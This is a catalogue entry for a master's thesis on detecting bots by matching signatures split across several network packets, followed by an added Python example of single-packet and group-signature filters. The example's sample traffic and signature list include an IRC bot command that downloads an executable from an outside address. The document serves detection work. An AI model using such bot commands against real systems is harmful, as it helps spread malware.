
A Bot Detecting Technique Based On Signatures Of Network Packets

Posted on: 2011-07-28
Degree: Master
Type: Thesis
Country: China
Candidate: F Liu
Full Text: PDF
GTID: 2198330332469423
Subject: Computer application technology
Abstract/Summary:
In recent years, with the growing popularity of the Internet and the increasing number of netizens in China, researchers have paid close attention to botnets. Especially after 2004, when the first botnet attack in China was recorded, people began to realize that this extremely hazardous new kind of attack is no longer a simple virus or Trojan horse but an attack platform from which an attacker can not only carry out a variety of attacks but also spread other viruses, Trojan horses and other malicious programs.

Traditional host-based defenses (anti-virus software, personal firewalls and the like) are an effective way of removing Trojans, viruses and other malicious programs and of resisting some network attacks. But the cases in recent years of anti-virus software mistakenly deleting files show that host-based methods alone are now insufficient for preventing and detecting Trojans, viruses and bot programs. A bot client evades detection not only by hiding its files and processes but also in the packets it transfers: it cuts the signature string into pieces and spreads them over several packets, so that a traditional detection method based on filtering single packets loses much of its accuracy or stops working altogether.

This thesis presents a botnet detection method based on a group-signature filter that is compatible with traditional signature-matching algorithms. Using multiple member signatures to filter the packets of intranet hosts, it is able to handle shortened and scattered signatures at a space cost of O(t·mn). The thesis first describes the group-signature detection algorithm and the details of the detection system.

The detection results reported in the thesis, from both simulated experiments and experiments in real scenarios, show that the botnet detection method based on the group-signature filter is feasible and that the detection system built on it is effective. The implemented system also solves the problem of real-time packet capture under high-speed network traffic: thanks to C/C++, WinPcap and multi-threading, it has low system overhead and few packet losses. The system provides a visual means of displaying results; through a tree view and a traffic-map view, network managers can examine real-time and historical data at any time. A description and storage format for signatures is proposed to improve the usability of the system, so that new signatures can easily be added to the detection system.
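The following is an added example, written for this page in Python rather than in the C/C++ and WinPcap of the thesis, and is not the thesis's code. It assumes one reading of the method described in the abstract: a group signature is an ordered set of short member signatures that must all appear, in order, in packets sent by the same intranet host within a bounded number of packets. The signature strings, host addresses and packet payloads are constructed for illustration, and the window size and the choice to reset stale partial matches are design assumptions of this example, not details taken from the thesis. The baseline `single_packet_filter` shows why a bot that scatters its signature over several packets defeats single-packet matching, and `group_signature_filter` shows the cross-packet matching that recovers it.

```python
# Group-signature matching across packets (added example, not the thesis's code).
#
# Assumptions of this example:
#   - a group signature is an ordered tuple of member byte strings;
#   - members must appear in that order in packets from the same source host;
#   - all members must arrive within `window` packets of the first match,
#     otherwise the partial match is discarded.

# Constructed signatures for illustration; not signatures from the thesis.
GROUP_SIGNATURES = {
    "irc-bot-join": (b"NICK [", b"JOIN #cmd", b".download http://"),
}

# Constructed sample traffic as (source host, payload) pairs, in capture order.
PACKETS = [
    ("10.0.0.5", b"NICK [DE|00|12345]\r\n"),
    ("10.0.0.5", b"USER x 0 0 :x\r\n"),
    ("10.0.0.5", b"JOIN #cmd\r\n"),
    ("10.0.0.5", b".download http://198.51.100.7/u.exe\r\n"),
    ("10.0.0.9", b"GET /index.html HTTP/1.1\r\n"),
    ("10.0.0.9", b"JOIN #cmd\r\n"),  # one member on its own must not alert
]


def single_packet_filter(packets, groups=GROUP_SIGNATURES):
    """Baseline: a signature matches only if every member is inside one packet.

    This is the traditional single-packet filter; once the bot spreads the
    members over several packets it never fires.
    """
    hits = []
    for host, payload in packets:
        for name, members in groups.items():
            if all(member in payload for member in members):
                hits.append((host, name))
    return hits


def group_signature_filter(packets, groups=GROUP_SIGNATURES, window=8):
    """Match member signatures in order across packets from the same host.

    State is kept only for (host, signature) pairs that have matched at
    least one member: [index of the next expected member, packets seen
    since the first member matched]. A partial match older than `window`
    packets is dropped, so a stray member cannot keep a host flagged
    forever and the state table stays bounded by the number of hosts
    with live partial matches times the number of group signatures.
    """
    progress = {}  # (host, name) -> [next_member_index, packets_since_first_hit]
    hits = []
    for host, payload in packets:
        for name, members in groups.items():
            key = (host, name)
            state = progress.get(key)
            if state is not None:
                state[1] += 1
                if state[1] > window:  # stale partial match: forget it
                    del progress[key]
                    state = None
            next_index = state[0] if state is not None else 0
            if members[next_index] in payload:
                if state is None:
                    state = progress[key] = [0, 0]
                state[0] += 1
                if state[0] == len(members):  # every member seen, in order
                    hits.append((host, name))
                    del progress[key]
    return hits


if __name__ == "__main__":
    print("single-packet filter:", single_packet_filter(PACKETS))
    print("group-signature filter:", group_signature_filter(PACKETS))
    print("group-signature filter, window=1:", group_signature_filter(PACKETS, window=1))
```

Run against the constructed traffic, the single-packet filter reports nothing, the group-signature filter reports the scattered signature from 10.0.0.5 and ignores the lone `JOIN #cmd` from 10.0.0.9, and shrinking the window to one packet makes the scattered match expire before it completes. Two caveats a practitioner would add: matching is against each packet's payload in isolation, so a member that itself straddles a packet boundary is missed unless the capture layer reassembles the stream, and the per-host state above is keyed on source address only, so it would need to be keyed on the flow (and cleared on connection close) in a deployment.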
Keywords/Search Tags: network security, botnet detection, group signature, DPI